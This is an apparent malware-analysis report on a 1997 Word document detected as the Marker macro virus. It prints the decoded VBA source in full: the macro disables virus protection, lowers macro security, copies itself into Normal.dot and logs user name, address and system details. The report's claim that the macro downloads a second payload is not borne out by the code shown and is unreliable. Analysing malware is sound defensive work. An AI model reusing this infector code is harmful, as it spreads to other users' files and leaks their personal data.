Office (OLE) malware analysis — malicious · 8e582bc4fecd63c2

MALICIOUS

Office (OLE)

273.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 05f2e1118f037521cc9226a7388da151 SHA-1: bb8ba5855fdaadf28f024f08e518cbe1d2781689 SHA-256: 8e582bc4fecd63c2b462d1c5f08c1ae1cdecf184dd3d7aad6e8c23c5ff8f5040

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon document opening. The presence of 'Doc.Trojan.Marker-39' from ClamAV further indicates malicious intent. The macro appears to be designed to download and execute a secondary payload, although the exact mechanism is obfuscated.

Heuristics 3

ClamAV: Doc.Trojan.Marker-39 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Marker-39
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 440697 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	440697 bytes
SHA-256: `9180b79d1e83e5b7c51b8cd92377fa382bb524e9c758fc771ee1f5faa619925a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() '@@ yz†”I�Ÿx�t�X^m„›�vY•HŽSiwOCXUŸo}_^‹HW–hf� Randomize Timer '@@QzžyXkhb…F›—O‘q�”i¤Šƒd£l�{�—X]’{™NQO„}jzF…ŒR‡„Yukkn‹l‚[BŠ�Ÿd—Gp}•TOˆfXf\]A�XZ‘o¡Š{ŒtR^‘Ipw Const Marker = "1234567890!@#$%^&()_" '@@—…sk£¡CD’ŒH›o\^JzV£’^�RDz^EZ„žx��Meb�O�¤¢Vœ…T�–›Š¢£ŸvHnnnT…\�A¡sGym•¢^RRˆQwdqPŸcX \|s On Error Resume Next '@@�ŠR…^¤ts}Gz’lu €aE‰zA‹{d––{~x{Q—K[d‘£��‘€LB‡Lfa�N’’IP]B–ž—�iSŠyCtcOb…Ž_ Dim Src, Dst As Object '@@¤i£\D�\|o Ž\|ŽA aB_[FMY•fWHZ†’�‘Pf}W€D\|vK…ˆUWR¢vO•˜`}aO…Yq„\SŽˆ€—…d•LwThrr_f• Dim S As String '@@n’Oiwayt^C“•W…‹‹—EHŠQw\|`YQl�_{€Y—x¢‡VwKYJƒ�c�ŒvZ�’mwž~W™O z¤~KŠ¡~x_�’]eD gŽ¤“�‰”nŠ Application.Options.SaveNormalPrompt = False '@@PzbQ�`wzŠOV_vJ{Ž„W‘tk\Ÿm•„FoBˆz_{££ywO‡JT�Uro‰kFieiˆžpPoœK”œa’L Application.Options.VirusProtection = False '@@˜I•{†FšŽgp System.ProfileString("Security", "Level") = "0" 'Îïðåäåëèì èñòî÷íèêè è ïîëó÷àòåëè òåëà If ThisDocument.Name = "Normal.dot" Then '@@q^›˜�ANcJLŸŽpXCiW_QP…EŒTg�mš]dK�ix Set Dst = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule '@@†€t Set Src = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule '@@�•pK\|O–aGwqSnˆOž`L^‰p\LyWj�v„[ UjJwdhM�žHEh[ Else '@@•Srrž‘^liˆ�u…s‘\|_d`JB™J HFŠ‰˜x“¤ŠVfA¤”ywbS‚JeYZXm�„ZŒ¤‹F�ˆ‚^Ss[�CZnNnœž{ˆwJX}w\g` Set Src = ThisDocument.VBProject.VBComponents.Item(1).CodeModule '@@URpk†pr�{HO�££hbƒPp Set Dst = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule '@@“bT”¤Vz�^’{…’Mb†eB\_mb›œhdqr™eUc \|mH]ajž‡`œ\gipcPk‚]Md~k› End If '@@ �EC‘ŒŒLL`•”]Iœ‚Ÿ¢•\Hšpt]Žwkl–œŠoQDlkb~‡—y\|Dc�b c”KD[š‰E’‘}“vŠ•`ƒ‹Ž If Not Dst.Find(Marker, 1, 1, -1, -1) Then '@@X ~Mc˜lUŒ¡eA�™E W–a‘›iU“E{ITWtP\|gOPRU[\~ƒ�j{—O\|aKaƒzV\|[‰OŸEP�uJœCl�~MŽDyX“šM^‚‚jE’POhk Src.InsertLines Src.CountOfLines + 1, "" '@@�¢cO¢A�rJ`CqYŠk\|` †Uk‰lMtW™U]K›e_‡`Žmwd[ljmJ•‡Z˜R¢›ŒZ�vœš�DVŽAIWyphc Src.InsertLines Src.CountOfLines + 1, "'" & Now() & " " '@@FY_TpW˜R†]�ho£ iQ¢ž–™“}i‹£Q”nK[lU Src.InsertLines Src.CountOfLines + 1, "'" & Application.UserName & " " & Application.UserAddress '@@uƒ‚šWEcyW\WnT�r�Iƒ…�Ž ¢�Hh�£žt€L”ML£xVbLJJl—š�m¤ Src.InsertLines Src.CountOfLines + 1, "'" & System.OperatingSystem & " " & System.Version & " " & System.ProcessorType '@@}bhMTeJšv‚x�eBRN—AD\q^¡`MXŠ Src.InsertLines Src.CountOfLines + 1, "" '@@wƒ�i AYF�zdrvTdQŽ£„bPpy�~›O�ƒ�\|^Ž’ŒhA“•¤›Yo‘„x For i = 1 To Src.CountOfLines '@@vsW‚b\†Mrh�†j¢Z£’VweOC£‰bžDn‰X›�^dePEt“V’~‚€Kd�kiƒtsw_~kp�}dQrhl“KHTgP¤hNEKA�HunqšgUvM˜o•Y~ S = Src.Lines(i, 1) '@@C‹TnxtB’XphS™p”“_j‚} If Len(S) > 0 And InStr(1, S, "'" & Chr(64) & Chr(64)) > 0 Then '@@†‘s£Œžf“IˆBVZle™h”DuŒPLn„pO~ƒ`i‹”lj“rž‡”Jy•€`^ S = "'" & Chr(64) & Chr(64) '@@VsTšO\lˆZl†£~Kƒg‰Kž£ ~E¡\F’‡TU� €‹kA`iu†vOfVB–H“^ X]ij‡yŠM€‘Tp‡tyO‚ For k = 1 To Int(Rnd 100) '@@QV S = S + Chr(Int(Rnd * 100) + 65) '@@RŒqc`ƒ Next '@@BmQOU End If '@@NTlJžQ‚ezKn^HF~IJB˜K˜ež’ci‰£sRœOIx‡\ky’�€¢Œ‡ŸLcLh¡qš…nQ€cHŠ—K‡irw�Dt¤¤ Dst.InsertLines i, S '@@¢�XMO¡A—BbWkŸ Next '@@iI„žV\|qŠeˆƒ�~¡WjL�”™EJD›eU…VŸWƒo–†”h£’YS”–yL B‘ozf\€yTŽx—jD^]jnAqFCBvžxX�˜J�”‰ƒŸDeTTž¡�†Or¡˜iu‰ NormalTemplate.Save '@@ŸSPHDq“‚’�PJh U~P�t“bžjJ—shWnJ™^˜LN End If '@@~¤nX€�„_oY”[zXM‘› Mx†oW {�b} ™–~nA–Œ˜pwˆUL „¢Ržl‘z`”\ide¡ˆrG“tX„‡DlAU]ƒ}��£ £s—£SagŠ If (Day(Now()) = 13) And (Month(Now()) = 10) Then '@@e‡ˆŒ”‹nPDS]t \|Œ\N Y_Ša›]X‘ MsgBox "Ïîçäðàâëÿþ ñåáÿ ñ Äåíì Ðîæäåíèÿ!", vbOKOnly, "Óðà!!!!" '@@VgŠCaeQ¢Ivty{q\|‹F_‹�‹E`�£wf]tjƒ¢E_�rLl�iObUQŽšgao\|]™[E�ž ŠxxbGd¢“}��\~G^G End If '@@VEh^n`›D “rQ—ve“ZriV�B‰“zIqž`�Aj¡£Iˆˆ¤vQSiIl˜Bgd™˜gœ•h™qN�gk_{NŠ•ŒsSG€trcg‡š{ƒ End Sub '15.06.2001 15:38:13 'Êàðòîõèí Ðóñëàí 'Windows 4.10 Pentium '21.06.2001 20:05:51 'Õðîìåíêîâ 'Windows NT 4.0 Pentium '25.06.2001 12:50:05 'Õðîìåíêîâ 'W ... (truncated)

SHA-256: 9180b79d1e83e5b7c51b8cd92377fa382bb524e9c758fc771ee1f5faa619925a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()
'@@ yz†”I�Ÿx�t�X^m„›�vY•HŽSiwOCXUŸo}_^‹HW–hf�
    Randomize Timer
'@@QzžyXkhb…F›—O‘q�”i¤Šƒd£l�{�—X]’{™NQO„}jzF…ŒR‡„Yukkn‹l‚[BŠ�Ÿd—Gp}•TOˆfXf\]A�XZ‘o¡Š{ŒtR^‘Ipw
    Const Marker = "1234567890!@#$%^&*()_"
'@@—…sk£¡CD’ŒH›o\^JzV£’^�RDz^EZ„žx��Meb�O�¤¢Vœ…T�–›Š¢£ŸvHnnnT…\�A¡sGym•¢^RRˆQwdqPŸcX |s
    On Error Resume Next
'@@�ŠR…^¤ts}Gz’lu €aE‰zA‹{d––{~x{Q—K[d‘£��‘€LB‡Lfa�N’’IP]B–ž—�iSŠyCtcOb…Ž_
    Dim Src, Dst As Object
'@@¤i£\D�|o Ž|ŽA aB_[FMY•fWHZ†’�‘Pf}W€D|vK…ˆUWR¢vO•˜`}aO…Yq„\SŽˆ€—…d•LwThrr_f•
    Dim S As String
'@@n’Oiwayt^C“•W…‹‹—EHŠQw|`YQl�_{€Y—x¢‡VwKYJƒ�c�ŒvZ�’mwž~W™O z¤~KŠ¡~x_�’]eD gŽ¤“�‰”nŠ
    Application.Options.SaveNormalPrompt = False
'@@PzbQ�`wzŠOV_vJ{Ž„W‘tk\Ÿm•„FoBˆz_{££ywO‡JT�Uro‰kFieiˆžpPoœK”œa’L
    Application.Options.VirusProtection = False
'@@˜I•{†FšŽgp
    System.ProfileString("Security", "Level") = "0"
    'Îïðåäåëèì èñòî÷íèêè è ïîëó÷àòåëè òåëà
    If ThisDocument.Name = "Normal.dot" Then
'@@q^›˜�ANcJLŸŽpXCiW_QP…EŒTg�mš]dK�ix
     Set Dst = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
'@@†€t
     Set Src = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
'@@�•pK|O–aGwqSnˆOž`L^‰p\LyWj�v„[ UjJwdhM�žHEh[
    Else
'@@•Srrž‘^liˆ�u…s‘|_d`JB™J HFŠ‰˜x“¤ŠVfA¤”ywbS‚JeYZXm�„ZŒ¤‹F�ˆ‚^Ss[�CZnNnœž{ˆwJX}w\g`
     Set Src = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
'@@URpk†pr�{HO�££hbƒPp
     Set Dst = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
'@@“bT”¤Vz�^’{…’Mb†eB\_mb›œhdqr™eUc |mH]ajž‡`œ\gipcPk‚]Md~k›
    End If
'@@ �EC‘ŒŒLL`•”]Iœ‚Ÿ¢•\Hšpt]Žwkl–œŠoQDlkb~‡—y|Dc�b c”KD[š‰E’‘}“vŠ•`ƒ‹Ž
    If Not Dst.Find(Marker, 1, 1, -1, -1) Then
'@@X ~Mc˜lUŒ¡eA�™E W–a‘›iU“E{ITWtP|gOPRU[\~ƒ�j{—O|aKaƒzV|[‰OŸEP�uJœCl�~MŽDyX“šM^‚‚jE’POhk
     Src.InsertLines Src.CountOfLines + 1, ""
'@@�¢cO¢A�rJ`CqYŠk|` †Uk‰lMtW™U]K›e_‡`Žmwd[ljmJ•‡Z˜R¢›ŒZ�vœš�DVŽAIWyphc
     Src.InsertLines Src.CountOfLines + 1, "'" & Now() & " "
'@@FY_TpW˜R†]�ho£ iQ¢ž–™“}i‹£Q”nK[lU
     Src.InsertLines Src.CountOfLines + 1, "'" & Application.UserName & " " & Application.UserAddress
'@@uƒ‚šWEcyW\WnT�r�Iƒ…�Ž ¢�Hh�£žt€L”ML£xVbLJJl—š�m¤
     Src.InsertLines Src.CountOfLines + 1, "'" & System.OperatingSystem & " " & System.Version & " " & System.ProcessorType
'@@}bhMTeJšv‚x�eBRN—AD\q^¡`MXŠ
     Src.InsertLines Src.CountOfLines + 1, ""
'@@wƒ�i AYF�zdrvTdQŽ£„bPpy�~›O�ƒ�|^Ž’ŒhA“•¤›Yo‘„x
     For i = 1 To Src.CountOfLines
'@@vsW‚b\†Mrh�†j¢Z£’VweOC£‰bžDn‰X›�^dePEt“V’~‚€Kd�kiƒtsw_~kp�}dQrhl“KHTgP¤hNEKA�HunqšgUvM˜o•Y~
      S = Src.Lines(i, 1)
'@@C‹TnxtB’XphS™p”“_j‚}
      If Len(S) > 0 And InStr(1, S, "'" & Chr(64) & Chr(64)) > 0 Then
'@@†‘s£Œžf“IˆBVZle™h”DuŒPLn„pO~ƒ`i‹”lj“rž‡”Jy•€`^
       S = "'" & Chr(64) & Chr(64)
'@@VsTšO\lˆZl†£~Kƒg‰Kž£ ~E¡\F’‡TU�  €‹kA`iu†vOfVB–H“^ X]ij‡yŠM€‘Tp‡tyO‚
       For k = 1 To Int(Rnd * 100)
'@@QV
        S = S + Chr(Int(Rnd * 100) + 65)
'@@RŒqc`ƒ
       Next
'@@BmQOU
      End If
'@@NTlJžQ‚ezKn^HF~IJB˜K˜ež’ci‰£sRœOIx‡\ky’�€¢Œ‡ŸLcLh¡qš…nQ€cHŠ—K‡irw�Dt¤¤
      Dst.InsertLines i, S
'@@¢�XMO¡A—BbWkŸ
     Next
'@@iI„žV|qŠeˆƒ�~¡WjL�”™EJD›eU…VŸWƒo–†”h£’YS”–yL B‘ozf\€yTŽx—jD^]jnAqFCBvžxX�˜J�”‰ƒŸDeTTž¡�†Or¡˜iu‰
     NormalTemplate.Save
'@@ŸSPHDq“‚’�PJh U~P�t“bžjJ—shWnJ™^˜LN
    End If
'@@~¤nX€�„_oY”[zXM‘› Mx†oW {�b} ™–~nA–Œ˜pwˆUL „¢Ržl‘z`”\ide¡ˆrG“tX„‡DlAU]ƒ}��£ £s—£SagŠ
    If (Day(Now()) = 13) And (Month(Now()) = 10) Then
'@@e‡ˆŒ”‹nPDS]t |Œ\N Y_Ša›]X‘
        MsgBox "Ïîçäðàâëÿþ ñåáÿ ñ Äåíì Ðîæäåíèÿ!", vbOKOnly, "Óðà!!!!"
'@@VgŠCaeQ¢Ivty{q|‹F_‹�‹E`�£wf]tjƒ¢E_�rLl�iObUQŽšgao|]™[E�ž ŠxxbGd¢“}��\~G^G
    End If
'@@VEh^n`›D “rQ—ve“ZriV�B‰“zIqž`�Aj¡£Iˆˆ¤vQSiIl˜Bgd™˜gœ•h™qN�gk_{NŠ•ŒsSG€trcg‡š{ƒ
End Sub


'15.06.2001 15:38:13
'Êàðòîõèí Ðóñëàí
'Windows 4.10 Pentium


'21.06.2001 20:05:51
'Õðîìåíêîâ
'Windows NT 4.0 Pentium


'25.06.2001 12:50:05
'Õðîìåíêîâ
'W
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.